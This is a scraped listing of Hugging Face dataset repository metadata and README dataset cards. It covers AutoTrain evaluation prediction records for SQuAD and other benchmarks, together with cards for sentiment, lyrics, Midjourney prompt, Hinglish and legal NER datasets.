37906d94ced6a00549b67d7e5d5bd8b295042f5d
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-df92c53c-2bfd-442d-8572-7541578e7feb-4110/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
calbert
null
null
null
false
1
false
calbert/hinglish-large
2022-09-22T13:54:30.000Z
null
false
e3d88e993898dafec8e57a66d67a24b757568ad5
[]
[ "annotations_creators:found", "language_bcp47:en-hi", "language_creators:found", "license:cc-by-4.0", "multilinguality:multilingual", "multilinguality:other-hindi-english-transliteration", "size_categories:100K<n<1M", "tags:calbert", "tags:code-mixing", "tags:code-mixed", "tags:hinglish", "tag...
https://huggingface.co/datasets/calbert/hinglish-large/resolve/main/README.md
--- annotations_creators: - found language_bcp47: - en-hi language_creators: - found license: - cc-by-4.0 multilinguality: - multilingual - other-hindi-english-transliteration pretty_name: IndicCorp Hinglish size_categories: - 100K<n<1M source_datasets: [] tags: - calbert - code-mixing - code-mixed - hinglish - india - indic - english - hindi task_categories: - feature-extraction - fill-mask - sentence-similarity - text2text-generation task_ids: - masked-language-modeling ---
autoevaluate
null
null
null
false
6
false
autoevaluate/autoeval-staging-eval-project-9ec0b53a-81c5-4d01-88f6-bf53413cd1a8-4611
2022-07-21T16:34:17.000Z
null
false
738a202f3044f0e5191aeee1061701c61f15e6cb
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-9ec0b53a-81c5-4d01-88f6-bf53413cd1a8-4611/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: autoevaluate/extractive-question-answering metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/extractive-question-answering * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-9ec0b53a-81c5-4d01-88f6-bf53413cd1a8-4612
2022-07-21T17:25:56.000Z
null
false
6d679cc141274969e47290ea5e6e6b3f25016591
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-9ec0b53a-81c5-4d01-88f6-bf53413cd1a8-4612/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: autoevaluate/distilbert-base-cased-distilled-squad metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/distilbert-base-cased-distilled-squad * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
rjac
null
null
null
false
3
false
rjac/all-the-news-2-1-Component-ones-cluster-labels
2022-07-31T16:42:40.000Z
null
false
56bcdcb3662d0c7a9409485d4499472ab7302350
[]
[]
https://huggingface.co/datasets/rjac/all-the-news-2-1-Component-ones-cluster-labels/resolve/main/README.md
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-7c1a5e5f-11505530
2022-07-21T17:47:03.000Z
null
false
1c37d22eef2e4e729d8908c098b0362848f42c51
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-7c1a5e5f-11505530/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
iuihgisgsd
null
null
null
false
1
false
iuihgisgsd/KHGKJHKGH
2022-07-21T17:58:38.000Z
null
false
4cef5e07f40409be5073c3f94d5d5e7ef5ce7f62
[]
[ "license:cc-by-sa-4.0" ]
https://huggingface.co/datasets/iuihgisgsd/KHGKJHKGH/resolve/main/README.md
--- license: cc-by-sa-4.0 ---
FinanceInc
null
null
null
false
33
false
FinanceInc/auditor_sentiment
2022-07-21T19:03:51.000Z
null
false
42ab35c272ec2a3248521e36ffffed0115dab581
[]
[ "annotations_creators:expert-generated", "language_creators:found", "language:en", "multilinguality:monolingual", "size_categories:1K<n<10K", "source_datasets:original", "task_categories:text-classification", "task_ids:multi-class-classification", "task_ids:sentiment-classification" ]
https://huggingface.co/datasets/FinanceInc/auditor_sentiment/resolve/main/README.md
--- annotations_creators: - expert-generated language_creators: - found language: - en multilinguality: - monolingual size_categories: - 1K<n<10K source_datasets: - original task_categories: - text-classification task_ids: - multi-class-classification - sentiment-classification paperswithcode_id: null pretty_name: Auditor_Sentiment --- # Dataset Card for Auditor Sentiment ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) ## Dataset Description Auditor review sentiment collected by News Department - **Point of Contact:** Talked to COE for Auditing, currently sue@demo.org ### Dataset Summary Auditor sentiment dataset of sentences from financial news. The dataset consists of several thousand sentences from English language financial news categorized by sentiment. ### Supported Tasks and Leaderboards Sentiment Classification ### Languages English ## Dataset Structure ### Data Instances ``` "sentence": "Pharmaceuticals group Orion Corp reported a fall in its third-quarter earnings that were hit by larger expenditures on R&D and marketing .", "label": "negative" ``` ### Data Fields - sentence: a tokenized line from the dataset - label: a label corresponding to the class as a string: 'positive' - (2), 'neutral' - (1), or 'negative' - (0) ### Data Splits A train/test split was created randomly with a 75/25 split ## Dataset Creation ### Curation Rationale To gather our auditor evaluations into one dataset. Previous attempts using off-the-shelf sentiment had only 70% F1, this dataset was an attempt to improve upon that performance. ### Source Data #### Initial Data Collection and Normalization The corpus used in this paper is made out of English news reports. #### Who are the source language producers? The source data was written by various auditors. ### Annotations #### Annotation process This release of the auditor reviews covers a collection of 4840 sentences. The selected collection of phrases was annotated by 16 people with adequate background knowledge on financial markets. The subset here is where inter-annotation agreement was greater than 75%. #### Who are the annotators? They were pulled from the SME list, names are held by sue@demo.org ### Personal and Sensitive Information There is no personal or sensitive information in this dataset. ## Considerations for Using the Data ### Social Impact of Dataset [More Information Needed] ### Discussion of Biases All annotators were from the same institution and so interannotator agreement should be understood with this taken into account. ### Licensing Information License: Demo.Org Proprietary - DO NOT SHARE This dataset is based on the [financial phrasebank](https://huggingface.co/datasets/financial_phrasebank) dataset.
nbsullivan
null
null
null
false
1
false
nbsullivan/song_lyrics
2022-07-21T20:19:14.000Z
null
false
795824409d295424e69005d881d5370f177265b8
[]
[]
https://huggingface.co/datasets/nbsullivan/song_lyrics/resolve/main/README.md
annotations_creators: - no-annotation language: - en language_creators: - found license: - unknown multilinguality: - monolingual pretty_name: structured song lyrics size_categories: [] source_datasets: [] tags: - lyrics task_categories: - text-generation task_ids: - language-modeling [Needs More Information] # Dataset Card for song_lyrics ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-instances) - [Data Splits](#data-instances) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) ## Dataset Description - **Homepage:** [Needs More Information] - **Repository:** [Needs More Information] - **Paper:** [Needs More Information] - **Leaderboard:** [Needs More Information] - **Point of Contact:** [Needs More Information] ### Dataset Summary Structured song lyrics ### Supported Tasks and Leaderboards text generation ### Languages English ## Dataset Structure ### Data Instances [Needs More Information] ### Data Fields [Needs More Information] ### Data Splits [Needs More Information] ## Dataset Creation ### Curation Rationale [Needs More Information] ### Source Data #### Initial Data Collection and Normalization [Needs More Information] #### Who are the source language producers? [Needs More Information] ### Annotations #### Annotation process [Needs More Information] #### Who are the annotators? [Needs More Information] ### Personal and Sensitive Information [Needs More Information] ## Considerations for Using the Data ### Social Impact of Dataset [Needs More Information] ### Discussion of Biases [Needs More Information] ### Other Known Limitations [Needs More Information] ## Additional Information ### Dataset Curators [Needs More Information] ### Licensing Information [Needs More Information] ### Citation Information [Needs More Information]
succinctly
null
null
null
false
99
false
succinctly/midjourney-prompts
2022-07-22T01:49:16.000Z
null
false
e670508f77f244a24a8bcf100f02011df9d8435b
[]
[ "license:apache-2.0" ]
https://huggingface.co/datasets/succinctly/midjourney-prompts/resolve/main/README.md
--- license: apache-2.0 --- [Midjourney](https://midjourney.com) is an independent research lab whose broad mission is to "explore new mediums of thought". In 2022, they launched a text-to-image service that, given a natural language prompt, produces visual depictions that are faithful to the description. Their service is accessible via a public [Discord server](https://discord.com/invite/midjourney): users issue a query in natural language, and the Midjourney bot returns AI-generated images that follow the given description. The raw dataset (with Discord messages) can be found on Kaggle: [Midjourney User Prompts & Generated Images (250k)](https://www.kaggle.com/datasets/succinctlyai/midjourney-texttoimage). The authors of the scraped dataset have no affiliation to Midjourney. This HuggingFace dataset was [processed](https://www.kaggle.com/code/succinctlyai/midjourney-text-prompts-huggingface) from the raw Discord messages to solely include the text prompts issued by the user (thus excluding the generated images and any other metadata). It could be used, for instance, to fine-tune a large language model to produce or auto-complete creative prompts for image generation. Check out [succinctly/text2image-prompt-generator](https://huggingface.co/succinctly/text2image-prompt-generator), a GPT-2 model fine-tuned on this dataset.
arize-ai
null
# @InProceedings{huggingface:dataset, # title = {A great new dataset}, # author={huggingface, Inc. # }, # year={2020} # } #
This dataset was crafted to be used in our tutorial [Link to the tutorial when ready]. It consists on product reviews from an e-commerce store. The reviews are labeled on a scale from 1 to 5 (stars). The training & validation sets are fully composed by reviews written in english. However, the production set has some reviews written in spanish. At Arize, we work to surface this issue and help you solve it.
false
1
false
arize-ai/cifar10_quality_drift
2022-10-25T10:40:25.000Z
null
false
35a56f3c865a3b3abdc7e3386804fe2063efd6f2
[]
[ "annotations_creators:expert-generated", "language_creators:expert-generated", "language:en", "license:mit", "multilinguality:monolingual", "size_categories:10K<n<100K", "source_datasets:extended|imdb", "task_categories:image-classification", "task_ids:multi-class-classification" ]
https://huggingface.co/datasets/arize-ai/cifar10_quality_drift/resolve/main/README.md
--- annotations_creators: - expert-generated language_creators: - expert-generated language: - en license: - mit multilinguality: - monolingual size_categories: - 10K<n<100K source_datasets: - extended|imdb task_categories: - image-classification task_ids: - multi-class-classification pretty_name: sentiment-classification-reviews-with-drift --- # Dataset Card for `reviews_with_drift` ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description ### Dataset Summary This dataset was crafted to be used in our tutorial [Link to the tutorial when ready]. It consists on a large Movie Review Dataset mixed with some reviews from a Hotel Review Dataset. The training/validation set are purely obtained from the Movie Review Dataset while the production set is mixed. Some other features have been added (`age`, `gender`, `context`) as well as a made up timestamp `prediction_ts` of when the inference took place. ### Supported Tasks and Leaderboards `text-classification`, `sentiment-classification`: The dataset is mainly used for text classification: given the text, predict the sentiment (positive or negative). ### Languages Text is mainly written in english. ## Dataset Structure ### Data Instances [More Information Needed] ### Data Fields [More Information Needed] ### Data Splits [More Information Needed] ## Dataset Creation ### Curation Rationale [More Information Needed] ### Source Data [More Information Needed] #### Initial Data Collection and Normalization [More Information Needed] #### Who are the source language producers? [More Information Needed] ### Annotations [More Information Needed] #### Annotation process [More Information Needed] #### Who are the annotators? [More Information Needed] ### Personal and Sensitive Information [More Information Needed] ## Considerations for Using the Data ### Social Impact of Dataset [More Information Needed] ### Discussion of Biases [More Information Needed] ### Other Known Limitations [More Information Needed] ## Additional Information ### Dataset Curators [More Information Needed] ### Licensing Information [More Information Needed] ### Citation Information [More Information Needed] ### Contributions Thanks to [@fjcasti1](https://github.com/fjcasti1) for adding this dataset.
Gpaiva
null
""" _DESCRIPTION =
(pt) NERDE é um dataset para NER a partir de documentos jurídicos da defesa econômica em português do Brasil, foi criado em colaboração com o Cade e o laboratório LATITUDE/UnB. (en) NERDE is a NER dataset from economic defense legal documents in Brazilian Portuguese, created in collaboration with Cade and the LATITUDE/UnB laboratory.
false
1
false
Gpaiva/NERDE
2022-07-28T01:27:18.000Z
null
false
3a0ac3296e467afae7bd4d6ffc6ab795af8904d9
[]
[ "annotations_creators:expert-generated", "language:pt", "language_creators:expert-generated", "license:cc-by-4.0", "multilinguality:monolingual", "size_categories:10K<n<100K", "source_datasets:original", "tags:ner", "tags:portuguese-ner", "tags:economic-defense", "task_categories:token-classific...
https://huggingface.co/datasets/Gpaiva/NERDE/resolve/main/README.md
--- annotations_creators: - expert-generated language: - pt language_creators: - expert-generated license: - cc-by-4.0 multilinguality: - monolingual pretty_name: NERDE size_categories: - 10K<n<100K source_datasets: - original tags: - ner - portuguese-ner - economic-defense task_categories: - token-classification task_ids: - named-entity-recognition --- # Dataset Card for NERDE ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description - **Repository:** [NERDE repository](https://github.com/guipaiva/NERDE) - **Point of Contact:** [Guilherme P. Paiva](mailto:guipaivagpp@gmail.com) ### Dataset Summary NERDE is a dataset for Named Entity Recognition for Economic Defense. It was created in collaboration with LATITUDE/UnB Laboratory and the Administrative Council for Economic Defense (Cade) ### Supported Tasks and Leaderboards [More Information Needed] ### Languages The language in the dataset is Brazilian Portuguese from legal documents. The BCP-47 code for Brazilian Portuguese is pt-BR ## Dataset Structure ### Data Instances [More Information Needed] ### Data Fields [More Information Needed] ### Data Splits [More Information Needed] ## Dataset Creation ### Curation Rationale [More Information Needed] ### Source Data #### Initial Data Collection and Normalization [More Information Needed] #### Who are the source language producers? [More Information Needed] ### Annotations #### Annotation process [More Information Needed] #### Who are the annotators? [More Information Needed] ### Personal and Sensitive Information [More Information Needed] ## Considerations for Using the Data ### Social Impact of Dataset [More Information Needed] ### Discussion of Biases [More Information Needed] ### Other Known Limitations [More Information Needed] ## Additional Information ### Dataset Curators [More Information Needed] ### Licensing Information [More Information Needed] ### Citation Information [More Information Needed] ### Contributions Thanks to [@guipaiva](https://github.com/guipaiva) for adding this dataset.
ASCCCCCCCC
null
null
null
false
18
false
ASCCCCCCCC/mix_info
2022-07-22T03:41:12.000Z
null
false
04a24bc0667e9a45a51f0ada6681aebc35898723
[]
[ "license:apache-2.0" ]
https://huggingface.co/datasets/ASCCCCCCCC/mix_info/resolve/main/README.md
--- license: apache-2.0 ---
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-sst2-ee5c821a-11545531
2022-07-22T06:33:53.000Z
null
false
49ea9e40149871828d02aed166988c67dcda75c4
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:sst2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-sst2-ee5c821a-11545531/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - sst2 eval_info: task: multi_class_classification model: distilbert-base-uncased-finetuned-sst-2-english metrics: [] dataset_name: sst2 dataset_config: default dataset_split: train col_mapping: text: sentence target: label --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Multi-class Text Classification * Model: distilbert-base-uncased-finetuned-sst-2-english * Dataset: sst2 * Config: default * Split: train To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@Neez](https://huggingface.co/Neez) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-cnn_dailymail-7c900a64-11555532
2022-07-23T22:08:35.000Z
null
false
97197c4a27472a1cb112d4f384ba6f70e040b2a6
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:cnn_dailymail" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-cnn_dailymail-7c900a64-11555532/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - cnn_dailymail eval_info: task: summarization model: tuner007/pegasus_summarizer metrics: ['accuracy', 'f1', 'precision', 'recall'] dataset_name: cnn_dailymail dataset_config: 3.0.0 dataset_split: train col_mapping: text: article target: highlights --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: tuner007/pegasus_summarizer * Dataset: cnn_dailymail * Config: 3.0.0 * Split: train To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@Neez](https://huggingface.co/Neez) for evaluating this model.
deepklarity
null
null
null
false
5
false
deepklarity/huggingface-spaces-dataset
2022-07-22T09:10:17.000Z
null
false
d1b54f2b452230e082fbdc30fe42b0f96c44ff16
[]
[ "license:cc" ]
https://huggingface.co/datasets/deepklarity/huggingface-spaces-dataset/resolve/main/README.md
--- license: cc --- This dataset provides information of all the spaces (~6,200 at time of snapshot) created on [HuggingFace Spaces](https://huggingface.co/spaces) 🤗. Most of the data comes from a public API endpoint while some of the data is enriched by web scraping. The dataset is intended to provide a snapshot of the spaces and was last updated in first week of *July-2022*. Along with the name of the space, the dataset consists of following columns: - likes (number of likes on the space) - sdk (streamlit,gradio or other) - status (was running successfully or had error when snapshot was taken) - total_commits (number of commits in the space) - last_commit (when did last commit happen) - community_interactions (number of interactions in the newly introduced Community tab) Apart from these, we have also added some post-processing columns (where space was using gradio): - inputs (Image/Text/Slider etc) - outputs (Image/Audio/Textbox etc) - ai_ml_reqs (If the requirements.txt contain a popular ML repo dependency like: torch, tensorflow, pandas, sklearn, scipy etc) Contributors: - [Abdullah Meda](https://www.linkedin.com/in/abdmeda/) - [Ayush Ranwa](https://twitter.com/Ayushranwa6) - [Deepak Rawat](https://twitter.com/dsr_ai) - [Kartik Godawat](https://twitter.com/kartik_godawat) Please reach out to us for any queries or discussions.
ccpp
null
null
null
false
1
false
ccpp/test1
2022-07-22T09:01:23.000Z
null
false
def0f9aff0c7f41639cb13e0307cdb17d76965ec
[]
[ "license:afl-3.0" ]
https://huggingface.co/datasets/ccpp/test1/resolve/main/README.md
--- license: afl-3.0 ---
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad-7ad816c0-11585539
2022-07-22T09:33:29.000Z
null
false
f2f8f031c380b6d0ccd2a8102a40717e4a036884
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad-7ad816c0-11585539/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: autoevaluate/extractive-question-answering metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/extractive-question-answering * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad-7ad816c0-11585538
2022-07-22T09:34:17.000Z
null
false
add96f0971c3921b3b77150838ef0d0494986fa9
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad-7ad816c0-11585538/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: autoevaluate/roberta-base-squad2 metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/roberta-base-squad2 * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad-7ad816c0-11585540
2022-07-22T09:33:32.000Z
null
false
7d2e66ed02c4ff5b893295433a4e2f9f7aaa3592
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad-7ad816c0-11585540/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: autoevaluate/distilbert-base-cased-distilled-squad metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/distilbert-base-cased-distilled-squad * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
6
false
autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595541
2022-07-22T09:34:44.000Z
null
false
ae4442bb10bc1cd57779ad99594d94db75420667
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595541/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
6
false
autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595542
2022-07-22T09:34:19.000Z
null
false
91aaa4a325ad414cfcde8690892b7dedb5425530
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595542/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/extractive-question-answering metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/extractive-question-answering * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
12
false
autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595543
2022-07-22T09:34:25.000Z
null
false
c9fbf6541ad051a61f3bea8ea553af895ddb0449
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595543/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/distilbert-base-cased-distilled-squad metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/distilbert-base-cased-distilled-squad * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
Vipitis
null
null
null
false
1
false
Vipitis/Shadertoys-fine
2022-07-24T15:13:31.000Z
null
false
f4712ab358518c7c2f289e30bcdfa5ef599f4fcf
[]
[ "annotations_creators:no-annotation", "language:en", "language:code", "language_creators:machine-generated", "license:cc-by-nc-sa-3.0", "size_categories:100K<n<1M", "tags:code", "task_categories:text-generation" ]
https://huggingface.co/datasets/Vipitis/Shadertoys-fine/resolve/main/README.md
